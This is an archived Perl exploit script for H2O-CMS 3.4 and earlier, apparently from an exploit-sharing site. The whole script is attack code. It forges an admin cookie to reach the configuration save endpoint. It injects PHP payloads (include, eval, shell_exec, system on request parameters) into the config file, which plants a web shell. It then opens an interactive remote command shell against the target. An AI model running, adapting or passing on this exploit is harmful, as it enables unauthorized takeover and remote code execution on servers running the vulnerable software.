Home / os / win10

h2ocms-exec.txt

Posted on 28 October 2008

#!/usr/bin/perl # ---------------------------------------------------------- # H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off) # Discovered By StAkeR[at]hotmail[dot]it # Download On http://sourceforge.net/projects/h2o-cms # ---------------------------------------------------------- use strict; use LWP::UserAgent; use LWP::Simple; my $post; my $sysc; my $host = shift or athos(); my $auth = "user=admin&id=1&admin=1"; my $http = new LWP::UserAgent; my $write = { 'site_title' => '";""; error_reporting(0); echo"//athos"; "', 'db_server' => '";""; include($_REQUEST["i"]); "', 'db_name' => '";""; eval($_REQUEST["g"]); "', 'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "', 'db_password' => '";""; echo system($_REQUEST["s"]); "', 'save' => 'Save', }; $http->default_header('Cookie' => $auth); $post = $http->post($host.'/index.php?option=SaveConfig',$write); sub start_exec { my $site = shift @_; my $exec = shift @_; my $view = get($site.'/includes/config.php?c='.$exec); return $view; } sub athos { print STDOUT "# Usage: perl $0 http://[host] "; print STDOUT "# Remote Command Execution Exploit "; exit; } unless(get($host) =~ ///athos/i) { print STDOUT "# Exploit Failed! "; exit; } else { while(1) { if(defined start_exec($host,$sysc)) { print STDOUT "[athos-shell] ~# "; chomp($sysc = <STDIN>); print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)." "; } } } __END__

 

TOP